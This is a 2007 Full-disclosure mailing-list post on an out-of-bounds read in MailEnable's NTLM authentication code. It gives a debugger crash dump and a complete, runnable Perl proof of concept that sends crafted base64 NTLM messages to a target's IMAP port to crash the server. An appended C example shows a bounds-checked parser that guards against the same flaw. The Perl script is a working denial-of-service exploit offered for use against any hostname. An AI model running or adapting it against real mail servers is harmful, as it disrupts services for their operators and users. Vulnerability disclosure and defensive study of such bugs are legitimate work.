
| Subject: | [Full-disclosure] MailEnable DoS POC |
|---|---|
| Date: | Wed, 14 Feb 2007 10:14:14 +0000 |
The POC attached exploits an out of bounds memory read in the NTLM authentication routines of MailEnable Pro/Enterprise. The problem lies in the NTLM_UnPack_Type3 function of MENTLM.dll.

This appears to have been silently "patched" somewhere between versions 2.351 and 2.36-7. (observe the quotes).

```
(c34.dc0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8146930b ebx=003a6cc8 ecx=00000040 edx=00000000 esi=8146920b edi=0146b238
eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
MENTLM!NTLM_UnPack_Type3+0x3019:
0109b4b3 f3a5    rep movs dword ptr es:[edi],dword ptr [esi] es:0023:0146b238=00000000 ds:0023:8146920b=????????
```

---------------------------------------------------------------------------
(mu-b@digit-labs.org)

```perl
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#              Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#
########

use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
    sleep($send_delay);

    $buf = ($PAD x 12).
           "\xfa\xff\xff\xff".
           ($PAD x 12);
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    $buf = ($PAD x 28).
           "\x00\x01".
           ($PAD x 2).
           "\xef\xbe\xad\xde";
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    print("-> * Successfully sent payload!\n");
}

sub print_header {
    print("MailEnable Pro <=v2.36 DoS POC\n");
    print("by: <mu-b\@digit-labs.org>\n\n");
}

sub usage {
    print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr = inet_aton($target) || die("Error: $!\n");
    $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr) || die("Error: $!\n");
    return(1338);
}
```
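
The access violation in the post is a `rep movs` whose source address is unreadable. As an added example (not part of the original post and not MailEnable's code), the following shows a bounds-checked copy of an NTLM security buffer, assuming the standard descriptor layout of 16-bit length, 16-bit maximum length and 32-bit offset. `ntlm_copy_secbuf` and `demo_parse` are hypothetical names, and the 64-byte message is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NTLM_HDR_LEN 12   /* "NTLMSSP\0" signature + 32-bit message type */

/* Little-endian reads that do not assume alignment. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Copy the payload named by the 8-byte descriptor at msg[field_off]
 * (u16 length, u16 max length, u32 offset) into out.
 * Returns the number of bytes copied, or -1 if the field is rejected.
 */
long ntlm_copy_secbuf(const uint8_t *msg, size_t msg_len, size_t field_off,
                      uint8_t *out, size_t out_cap)
{
    if (msg_len < 8 || field_off > msg_len - 8)
        return -1;                    /* descriptor itself is truncated */
    size_t len = rd16(msg + field_off);
    size_t off = rd32(msg + field_off + 4);

    if (off < NTLM_HDR_LEN || off > msg_len)
        return -1;                    /* offset points outside the message */
    if (len > msg_len - off)
        return -1;                    /* payload runs past the end; no wraparound */
    if (len > out_cap)
        return -1;                    /* would overflow the destination */
    memcpy(out, msg + off, len);
    return (long)len;
}

/* Constructed sample: 64-byte type 3 message with one descriptor at offset 28. */
long demo_parse(uint16_t len, uint32_t off)
{
    uint8_t msg[64] = "NTLMSSP", out[32];
    msg[8]  = 3;                                       /* message type */
    msg[28] = (uint8_t)(len & 0xff);
    msg[29] = (uint8_t)(len >> 8);
    msg[30] = msg[28]; msg[31] = msg[29];              /* max length = length */
    msg[32] = (uint8_t)(off & 0xff);         msg[33] = (uint8_t)((off >> 8) & 0xff);
    msg[34] = (uint8_t)((off >> 16) & 0xff); msg[35] = (uint8_t)((off >> 24) & 0xff);
    return ntlm_copy_secbuf(msg, sizeof msg, 28, out, sizeof out);
}
```

The length check is written as `len > msg_len - off` rather than `off + len > msg_len` so that a large attacker-supplied offset cannot wrap the sum and pass the comparison.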